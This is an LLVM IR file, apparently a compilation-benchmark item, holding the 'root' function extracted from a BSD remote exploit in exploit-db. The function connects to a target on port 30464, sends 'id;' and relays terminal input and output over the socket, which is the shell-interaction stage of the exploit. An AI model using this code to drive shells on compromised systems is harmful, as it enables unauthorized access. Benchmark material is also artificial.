; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/bsd/remote/extr_432.c_root.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/bsd/remote/extr_432.c_root.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [5 x i8] c"id;\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @root(i8* %0) #0 {
  %2 = alloca i8*, align 8
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i32, align 4
  %6 = alloca [1024 x i8], align 16
  store i8* %0, i8** %2, align 8
  %7 = load i8*, i8** %2, align 8
  %8 = call i32 @connect_to(i8* %7, i32 30464)
  store i32 %8, i32* %5, align 4
  %9 = load i32, i32* %5, align 4
  %10 = call i32 @send(i32 %9, i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str, i64 0, i64 0), i32 4, i32 0)
  br label %11

11:                                               ; preds = %1, %56
  %12 = call i32 @FD_ZERO(i32* %3)
  %13 = call i32 @FD_SET(i32 0, i32* %3)
  %14 = load i32, i32* %5, align 4
  %15 = call i32 @FD_SET(i32 %14, i32* %3)
  %16 = load i32, i32* %5, align 4
  %17 = add nsw i32 %16, 1
  %18 = call i32 @select(i32 %17, i32* %3, i32* null, i32* null, i32* null)
  %19 = icmp slt i32 %18, 1
  br i1 %19, label %20, label %22

20:                                               ; preds = %11
  %21 = call i32 @exit(i32 0) #3
  unreachable

22:                                               ; preds = %11
  %23 = call i64 @FD_ISSET(i32 0, i32* %3)
  %24 = icmp ne i64 %23, 0
  br i1 %24, label %25, label %41

25:                                               ; preds = %22
  %26 = getelementptr inbounds [1024 x i8], [1024 x i8]* %6, i64 0, i64 0
  %27 = call i32 @read(i32 0, i8* %26, i32 1024)
  store i32 %27, i32* %4, align 4
  %28 = icmp slt i32 %27, 1
  br i1 %28, label %29, label %31

29:                                               ; preds = %25
  %30 = call i32 @exit(i32 0) #3
  unreachable

31:                                               ; preds = %25
  %32 = load i32, i32* %5, align 4
  %33 = getelementptr inbounds [1024 x i8], [1024 x i8]* %6, i64 0, i64 0
  %34 = load i32, i32* %4, align 4
  %35 = call i32 @send(i32 %32, i8* %33, i32 %34, i32 0)
  %36 = load i32, i32* %4, align 4
  %37 = icmp ne i32 %35, %36
  br i1 %37, label %38, label %40

38:                                               ; preds = %31
  %39 = call i32 @exit(i32 0) #3
  unreachable

40:                                               ; preds = %31
  br label %41

41:                                               ; preds = %40, %22
  %42 = load i32, i32* %5, align 4
  %43 = call i64 @FD_ISSET(i32 %42, i32* %3)
  %44 = icmp ne i64 %43, 0
  br i1 %44, label %45, label %56

45:                                               ; preds = %41
  %46 = load i32, i32* %5, align 4
  %47 = getelementptr inbounds [1024 x i8], [1024 x i8]* %6, i64 0, i64 0
  %48 = call i32 @recv(i32 %46, i8* %47, i32 1024, i32 0)
  store i32 %48, i32* %4, align 4
  %49 = icmp slt i32 %48, 1
  br i1 %49, label %50, label %52

50:                                               ; preds = %45
  %51 = call i32 @exit(i32 0) #3
  unreachable

52:                                               ; preds = %45
  %53 = getelementptr inbounds [1024 x i8], [1024 x i8]* %6, i64 0, i64 0
  %54 = load i32, i32* %4, align 4
  %55 = call i32 @write(i32 1, i8* %53, i32 %54)
  br label %56

56:                                               ; preds = %52, %41
  br label %11
}

declare dso_local i32 @connect_to(i8*, i32) #1

declare dso_local i32 @send(i32, i8*, i32, i32) #1

declare dso_local i32 @FD_ZERO(i32*) #1

declare dso_local i32 @FD_SET(i32, i32*) #1

declare dso_local i32 @select(i32, i32*, i32*, i32*, i32*) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i64 @FD_ISSET(i32, i32*) #1

declare dso_local i32 @read(i32, i8*, i32) #1

declare dso_local i32 @recv(i32, i8*, i32, i32) #1

declare dso_local i32 @write(i32, i8*, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
